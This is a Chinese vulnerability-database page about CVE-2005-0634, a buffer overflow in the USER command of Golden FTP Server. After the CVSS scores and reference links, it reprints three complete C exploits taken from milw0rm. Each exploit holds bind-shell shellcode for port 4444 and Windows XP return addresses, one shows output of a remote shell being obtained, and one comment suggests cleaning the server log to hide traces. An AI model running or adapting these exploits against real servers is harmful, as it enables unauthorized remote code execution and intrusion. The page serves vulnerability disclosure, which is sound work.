CVE-2005-0634
CVSS7.5
发布时间 :2005-05-02 00:00:00
修订时间 :2011-03-07 21:20:19
NMCOE    

[原文]Buffer overflow in Golden FTP Server 1.92 allows remote attackers to execute arbitrary code via a long USER command.


[CNNVD]Golden FTP服务器用户名远程缓冲区溢出漏洞(CNNVD-200505-675)

        Golden FTP Server 1.92中存在缓冲区溢出,远程攻击者因此可以通过长的用户命令来执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0634
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0634
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-675
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/4936
(UNKNOWN)  VUPEN  ADV-2006-4936
http://www.securityfocus.com/bid/12704
(UNKNOWN)  BID  12704
http://www.securityfocus.com/archive/1/391987
(VENDOR_ADVISORY)  BUGTRAQ  20050302 Golden Ftp server 1.29 Username remote Buffer Overflow
http://secunia.com/advisories/23323
(UNKNOWN)  SECUNIA  23323
http://retrogod.altervista.org/golden_heap.html
(UNKNOWN)  MISC  http://retrogod.altervista.org/golden_heap.html

- 漏洞信息

Golden FTP服务器用户名远程缓冲区溢出漏洞
高危 缓冲区溢出
2005-05-02 00:00:00 2005-10-20 00:00:00
远程  
        Golden FTP Server 1.92中存在缓冲区溢出,远程攻击者因此可以通过长的用户命令来执行任意代码。

- 公告与补丁

        暂无数据

- 漏洞信息 (967)

Golden FTP Server Pro 2.52 Remote Buffer Overflow Exploit (EDBID:967)
windows remote
2005-04-29 Verified
21 ATmaCA
[点击下载] [点击下载]
/*
*
* Golden FTP Server Pro Remote Buffer Overflow Exploit
* Bug Discovered by Reed Arvin (http://reedarvin.thearvins.com)
* Exploit coded By ATmaCA
* Web: atmacasoft.com && spyinstructors.com
* E-Mail: atmaca@icqmail.com
* Credit to kozan and metasploit
* Usage:exploit <targetOs> <targetIp>
*
*/

/*
*
* Vulnerable Versions:
* Golden FTP Server Pro v2.52
*
* Exploit:
* Run the exploit against the server. Afterward, right
* click on the Golden FTP Server Pro icon in the Windows tray and click
* Statistic.
* It will open bind shell on port 4444
*
*/

#include <windows.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")

char userreq[] =
"USER "
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";

char *target[]=  //return addr
{
       "\xFC\x18\xD7\x77",   //WinXp Sp1 Eng - jmp esp addr
       "\xBF\xAC\xDA\x77"    //WinXp Sp2 Eng - jmp esp addr
};

char shellcode[] =
/* win32_bind -  EXITFUNC=seh LPORT=4444 Size=348 Encoder=PexFnstenvSub http://metasploit.com */
"\x31\xc9\x83\xe9\xaf\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x82"
"\x2a\x64\x94\x83\xeb\xfc\xe2\xf4\x7e\x40\x8f\xdb\x6a\xd3\x9b\x6b"
"\x7d\x4a\xef\xf8\xa6\x0e\xef\xd1\xbe\xa1\x18\x91\xfa\x2b\x8b\x1f"
"\xcd\x32\xef\xcb\xa2\x2b\x8f\x77\xb2\x63\xef\xa0\x09\x2b\x8a\xa5"
"\x42\xb3\xc8\x10\x42\x5e\x63\x55\x48\x27\x65\x56\x69\xde\x5f\xc0"
"\xa6\x02\x11\x77\x09\x75\x40\x95\x69\x4c\xef\x98\xc9\xa1\x3b\x88"
"\x83\xc1\x67\xb8\x09\xa3\x08\xb0\x9e\x4b\xa7\xa5\x42\x4e\xef\xd4"
"\xb2\xa1\x24\x98\x09\x5a\x78\x39\x09\x6a\x6c\xca\xea\xa4\x2a\x9a"
"\x6e\x7a\x9b\x42\xb3\xf1\x02\xc7\xe4\x42\x57\xa6\xea\x5d\x17\xa6"
"\xdd\x7e\x9b\x44\xea\xe1\x89\x68\xb9\x7a\x9b\x42\xdd\xa3\x81\xf2"
"\x03\xc7\x6c\x96\xd7\x40\x66\x6b\x52\x42\xbd\x9d\x77\x87\x33\x6b"
"\x54\x79\x37\xc7\xd1\x79\x27\xc7\xc1\x79\x9b\x44\xe4\x42\x75\xc8"
"\xe4\x79\xed\x75\x17\x42\xc0\x8e\xf2\xed\x33\x6b\x54\x40\x74\xc5"
"\xd7\xd5\xb4\xfc\x26\x87\x4a\x7d\xd5\xd5\xb2\xc7\xd7\xd5\xb4\xfc"
"\x67\x63\xe2\xdd\xd5\xd5\xb2\xc4\xd6\x7e\x31\x6b\x52\xb9\x0c\x73"
"\xfb\xec\x1d\xc3\x7d\xfc\x31\x6b\x52\x4c\x0e\xf0\xe4\x42\x07\xf9"
"\x0b\xcf\x0e\xc4\xdb\x03\xa8\x1d\x65\x40\x20\x1d\x60\x1b\xa4\x67"
"\x28\xd4\x26\xb9\x7c\x68\x48\x07\x0f\x50\x5c\x3f\x29\x81\x0c\xe6"
"\x7c\x99\x72\x6b\xf7\x6e\x9b\x42\xd9\x7d\x36\xc5\xd3\x7b\x0e\x95"
"\xd3\x7b\x31\xc5\x7d\xfa\x0c\x39\x5b\x2f\xaa\xc7\x7d\xfc\x0e\x6b"
"\x7d\x1d\x9b\x44\x09\x7d\x98\x17\x46\x4e\x9b\x42\xd0\xd5\xb4\xfc"
"\x72\xa0\x60\xcb\xd1\xd5\xb2\x6b\x52\x2a\x64\x94";

char nops[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90";

char passreq[] =
"PASS \r\n";

void main(int argc, char *argv[])
{
        WSADATA wsaData;
        WORD wVersionRequested;
        struct hostent  *pTarget;
        struct sockaddr_in 	sock;
        SOCKET mysocket;
        char rec[1024];

        if (argc < 3)
        {
                printf("\r\nGolden FTP Server Pro Remote Buffer Overflow Exploit\r\n",argv[0]);
                printf("Bug Discovered by Reed Arvin (http://reedarvin.thearvins.com)\r\n");
                printf("Exploit coded By ATmaCA\r\n");
                printf("Web: atmacasoft.com && spyinstructors.com\r\n");
                printf("Credit to kozan and metasploit\r\n");
                printf("Usage:\r\nexploit <targetOs> <targetIp>\r\n\r\n",argv[0]);
                printf("Targets:\n");
                printf("1 - WinXP SP1 english\n");
                printf("2 - WinXP SP2 english\n");
                printf("Example:exploit 2 127.0.0.1\n");

                return;
       }
       int targetnum = atoi(argv[1]) - 1;

       char *evilbuf = (char*)malloc(sizeof(userreq)+sizeof(shellcode)+sizeof(nops)
                                +sizeof(passreq)+7);
       strcpy(evilbuf,userreq);
       strcat(evilbuf,target[targetnum]);
       strcat(evilbuf,nops);
       strcat(evilbuf,shellcode);
       strcat(evilbuf,"\r\n");
       strcat(evilbuf,passreq);
       //printf("%s",evilbuf);

       wVersionRequested = MAKEWORD(1, 1);
       if (WSAStartup(wVersionRequested, &wsaData) < 0) return;



       mysocket = socket(AF_INET, SOCK_STREAM, 0);
       if(mysocket==INVALID_SOCKET){
                  printf("Socket error!\r\n");
                  exit(1);
       }

       printf("Resolving Hostnames...\n");
       if ((pTarget = gethostbyname(argv[2])) == NULL){
                  printf("Resolve of %s failed\n", argv[1]);
                  exit(1);
       }

       memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
       sock.sin_family = AF_INET;
       sock.sin_port = htons(21);

       printf("Connecting...\n");
       if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) ))){
                  printf("Couldn't connect to host.\n");
                  exit(1);
       }

       printf("Connected!...\n");
       printf("Waiting for welcome message...\n");
       Sleep(10);
       recv(mysocket,rec,1024,0);

       printf("Sending evil request...\n");
       if (send(mysocket,evilbuf, strlen(evilbuf)+1, 0) == -1){
                  printf("Error Sending evil request.\r\n");
                  closesocket(mysocket);
                  exit(1);
       }

       Sleep(10);
       printf("Success.\n");
       closesocket(mysocket);
       WSACleanup();
}

// milw0rm.com [2005-04-29]
		

- 漏洞信息 (968)

Golden FTP Server Pro 2.52 Remote Buffer Overflow Exploit (2nd) (EDBID:968)
windows remote
2005-04-29 Verified
21 c0d3r
[点击下载] [点击下载]
/*
   Golden FTP Server Pro remote stack BOF exploit
   author : c0d3r "kaveh razavi" c0d3rz_team@yahoo.com c0d3r@ihsteam.com
   risk : highly critical
   vender status : no patch released , all targets are vuln 
   package : golden-ftp-server-pro 2.5.0.0 and prior
   advisory :  http://secunia.com/advisories/15156/
   vender address : www.goldenftpserver.com
   timeline :
   28 Apr 2005 : Public Disclosure
   29 Apr 2005 : IHS exploit released , winxpsp1 & winxpsp2 target
   after running the exploit u need to restart the server after that 
   the server will be closed automatically then u will have a shell
   on port 4444 . if u want to erase the crap just clean the GFTPpro.log
   manually as mentioned in the advisory .
   workaround : upgrade to newer version or use another FTP server . 
   compiled with visual c++ 6 : cl golden-ftp.c
   greetz : IHSTeam members,exploit-dev mates,securiteam,str0ke-milw0rm
   (C) IHS security 2005
*/

/*
D:\projects>golden-ftp 127.0.0.1 21 0

-------- Golden FTP Server Pro remote stack BOF exploit by c0d3r

[+] building overflow string
[+] attacking host 127.0.0.1
[+] packet size = 755 byte
[+] connected
[+] sending the overflow string
[+] exploit sent successfully !
[+] restart the Ftp server then nc 127.0.0.1 4444


D:\projects>nc -vv 127.0.0.1 4444
DNS fwd/rev mismatch: localhost != kaveh
localhost [127.0.0.1] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\Golden FTP Server Pro>
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define NOP 0x90
#define size 755

// 5 byte user command + 332 byte NOP junk + 4 byte return address
// + 15 byte NOP + 399 byte shellcode 

// using metasploit great shellcode LPORT=4444 Size=399

unsigned char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74"
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18"
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";
  
  
  unsigned int rc,rc2,sock,os,addr ;
  struct sockaddr_in tcp;
  struct hostent *hp;
  WSADATA wsaData;
  unsigned char *recvbuf;
  char buffer[size];
  char jmp_esp[5];
  unsigned short port;
  char hex1[] = "\x75\x73\x65\x72\x20";
  char hex2[] = "\x70\x61\x73\x73\x20\x61\x61\x61\x61";
  char hex3[] = "\x5C\x6E";
  char winxpsp1[] = "\x57\x94\xAE\x77"; // shell32.dll :D
  char winxpsp2[] = "\xED\x1E\x94\x7C"; // not tested
  
 int main (int argc, char *argv[]){
  
 
  if(argc < 3) {
 printf("\n-------- Golden FTP Server Pro remote stack BOF exploit by c0d3r\n");
 printf("-------- usage : golden-ftp.exe host port target\n");
 printf("-------- target 1 : windows xp service pack 1 : 0\n");
 printf("-------- target 2 : windows xp service pack 2 : 1\n");
 printf("-------- eg : golden-ftp.exe 127.0.0.1 80 0\n\n");
 exit(-1) ;
  }
  printf("\n-------- Golden FTP Server Pro remote stack BOF exploit by c0d3r\n\n");
 os = (unsigned short)atoi(argv[3]);
  switch(os)
  {
   case 0:
    strcat(jmp_esp,winxpsp1);
    break;
   case 1:
    strcat(jmp_esp,winxpsp2); // wasnt checked
    break;
   default:
    printf("\n[-] this target doesnt exist in the list\n\n");
   
    exit(-1);
  }

    // Creating heart of exploit code
  
    printf("[+] building overflow string");
  
    memset(buffer,NOP,size);
    memcpy(buffer,hex1,sizeof(hex1)-1);
    memcpy(buffer+337,jmp_esp,sizeof(jmp_esp)-1);
    memcpy(buffer+356,shellcode,sizeof(shellcode)-1);
    buffer[size] = 0;
 
    // EO heart of exploit code

   recvbuf = malloc(256);
   memset(recvbuf,0,256);
   
   if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
   printf("[-] WSAStartup failed !\n");
   exit(-1);
  }
 hp = gethostbyname(argv[1]);
  if (!hp){
   addr = inet_addr(argv[1]);
  }
  if ((!hp) && (addr == INADDR_NONE) ){
   printf("[-] unable to resolve %s\n",argv[1]);
   exit(-1);
  }
  sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
  if (!sock){
   printf("[-] socket() error...\n");
   exit(-1);
  }
   if (hp != NULL)
   memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
  else
   tcp.sin_addr.s_addr = addr;

  if (hp)
   tcp.sin_family = hp->h_addrtype;
  else
  tcp.sin_family = AF_INET;
  port=atoi(argv[2]);
  tcp.sin_port=htons(port);
   
  
  printf("\n[+] attacking host %s\n" , argv[1]) ;
  
  
  
  printf("[+] packet size = %d byte\n" , sizeof(buffer));
  
  rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
  if(rc==0)
  {
    
     Sleep(1000) ;
  printf("[+] connected\n") ;
  printf("[+] sending the overflow string\n") ;
  rc2=recv(sock,recvbuf,256,0);
  Sleep(1000);
  send(sock,buffer,strlen(buffer),0);
  send(sock,"\n",1,0);
  rc2=recv(sock,recvbuf,256,0);
  Sleep(1000);
  send(sock,hex2,strlen(hex2),0);
  send(sock,"\n",1,0);
  printf("[+] exploit sent successfully !\n");
  printf("[+] restart the Ftp server then nc %s 4444\n\n",argv[1]);
  
  }
  
  else {
      printf("[-] ouch! Server is not listening .... \n\n");
 }
  shutdown(sock,1);
  closesocket(sock);
  }
  // EO exploit code

// milw0rm.com [2005-04-29]
		

- 漏洞信息 (969)

Golden FTP Server Pro 2.52 Remote Buffer Overflow Exploit (3rd) (EDBID:969)
windows remote
2005-04-29 Verified
21 darkeagle
[点击下载] [点击下载]
/*
\ golden ftp 2.52.0.0 remote r00t exploit
/
\ remote r00t exploit binds 4444 port on remote machine.
/ tested on: winxp sp0 rus
\
/ simple stack overflow in golden ftpd.
\ if retaddr isn't right, ftpd will crash, and admin will be in big shit
/ 'coz ftpd won't start later ;)
\
/ code to be executed, admin must restart or shutdown ftpd... then ftpd will execute eviLDuDe'Z c0de )
\
/ gr33tz: choix, nekd0, xtix, crash-x, coki, rave, antiq, xoce, shi, 'em, lp, spekterX, edisan, c0wboy
\ ilja, esDee, blackhatz.inf0, sk3w
/ p.s }:+ EvILduDe
\ (c) uKt research '04/'05
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock.h>
#include <windows.h>

#define RETADDR 0x77F510B0

char shellcode[]= // binds 4444 port
"\xd9\xEE\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xb1\xbe"
"\x94\x1d\x83\xeb\xfc\xe2\xf4\x4d\x56\xc2\x1d\xb1\xbe\xc7\x48\xe7"
"\xe9\x1f\x71\x95\xa6\x1f\x58\x8d\x35\xc0\x18\xc9\xbf\x7e\x96\xfb"
"\xa6\x1f\x47\x91\xbf\x7f\xfe\x83\xf7\x1f\x29\x3a\xbf\x7a\x2c\x4e"
"\x42\xa5\xdd\x1d\x86\x74\x69\xb6\x7f\x5b\x10\xb0\x79\x7f\xef\x8a"
"\xc2\xb0\x09\xc4\x5f\x1f\x47\x95\xbf\x7f\x7b\x3a\xb2\xdf\x96\xeb"
"\xa2\x95\xf6\x3a\xba\x1f\x1c\x59\x55\x96\x2c\x71\xe1\xca\x40\xea"
"\x7c\x9c\x1d\xef\xd4\xa4\x44\xd5\x35\x8d\x96\xea\xb2\x1f\x46\xad"
"\x35\x8f\x96\xea\xb6\xc7\x75\x3f\xf0\x9a\xf1\x4e\x68\x1d\xda\x30"
"\x52\x94\x1c\xb1\xbe\xc3\x4b\xe2\x37\x71\xf5\x96\xbe\x94\x1d\x21"
"\xbf\x94\x1d\x07\xa7\x8c\xfa\x15\xa7\xe4\xf4\x54\xf7\x12\x54\x15"
"\xa4\xe4\xda\x15\x13\xba\xf4\x68\xb7\x61\xb0\x7a\x53\x68\x26\xe6"
"\xed\xa6\x42\x82\x8c\x94\x46\x3c\xf5\xb4\x4c\x4e\x69\x1d\xc2\x38"
"\x7d\x19\x68\xa5\xd4\x93\x44\xe0\xed\x6b\x29\x3e\x41\xc1\x19\xe8"
"\x37\x90\x93\x53\x4c\xbf\x3a\xe5\x41\xa3\xe2\xe4\x8e\xa5\xdd\xe1"
"\xee\xc4\x4d\xf1\xee\xd4\x4d\x4e\xeb\xb8\x94\x76\x8f\x4f\x4e\xe2"
"\xd6\x96\x1d\xa0\xe2\x1d\xfd\xdb\xae\xc4\x4a\x4e\xeb\xb0\x4e\xe6"
"\x41\xc1\x35\xe2\xea\xc3\xe2\xe4\x9e\x1d\xda\xd9\xfd\xd9\x59\xb1"
"\x37\x77\x9a\x4b\x8f\x54\x90\xcd\x9a\x38\x77\xa4\xe7\x67\xb6\x36"
"\x44\x17\xf1\xe5\x78\xd0\x39\xa1\xfa\xf2\xda\xf5\x9a\xa8\x1c\xb0"
"\x37\xe8\x39\xf9\x37\xe8\x39\xfd\x37\xe8\x39\xe1\x33\xd0\x39\xa1"
"\xea\xc4\x4c\xe0\xef\xd5\x4c\xf8\xef\xc5\x4e\xe0\x41\xe1\x1d\xd9"
"\xcc\x6a\xae\xa7\x41\xc1\x19\x4e\x6e\x1d\xfb\x4e\xcb\x94\x75\x1c"
"\x67\x91\xd3\x4e\xeb\x90\x94\x72\xd4\x6b\xe2\x87\x41\x47\xe2\xc4"
"\xbe\xfc\xed\x3b\xba\xcb\xe2\xe4\xba\xa5\xc6\xe2\x41\x44\x1d";

int main ( int argc, char *argv[] )
{
WSADATA wsa;
SOCKET sock;
char data[6667], evil[7776];
struct sockaddr_in addr;

printf("\n\n >> Golden FTP Server Pro 2.52.0.0 Remote Root Exploit <<\n :: by darkeagle [unl0ck] ::\n >> http://unl0ck.org <<\n\n");

WSAStartup(MAKEWORD(2,0), &wsa);

if ( argc < 3 )
{
printf(" >usage: %s <ip> <port>\n\n", argv[0]);
exit(0);
}

printf(" [*] ip: %s, port: %d\n", argv[1], atoi(argv[2]));

addr.sin_family = AF_INET;
addr.sin_port = htons(atoi(argv[2]));
addr.sin_addr.s_addr = inet_addr(argv[1]);

sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);

memset(data, 0x00, sizeof(data));
memset(evil, 0x00, sizeof(evil));
memset(data, 0x55, 372);

*(long*)&data[332] = RETADDR;
memcpy(data, &shellcode, sizeof(shellcode));

printf(" [`] connecting...\n");

if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) > 0 ) { printf(" [+] connected\n"); } else { exit(0); }

sprintf(evil, "USER %s\r\nPASS\r\n", data);

Sleep(1000);
send(sock, evil, strlen(evil), 1);

printf(" [+] send. w8ing while ftpd will reboot...\n\n");

closesocket(sock);
WSACleanup();

return 0;

}

// milw0rm.com [2005-04-29]
		

- 漏洞信息

14369
Golden FTP Server Username Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public

- 漏洞描述

A remote overflow exists in Golden FTP Server. The Golden FTP Server fails to properly perform bounds checking on user-supplied input, resulting in a buffer overflow. With a specially crafted login request containing more than 284 characters in the Username field, a remote attacker can cause execution of arbitrary code on the system resulting in a loss of integrity.

- 时间线

2005-03-02 Unknow
2005-03-02 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站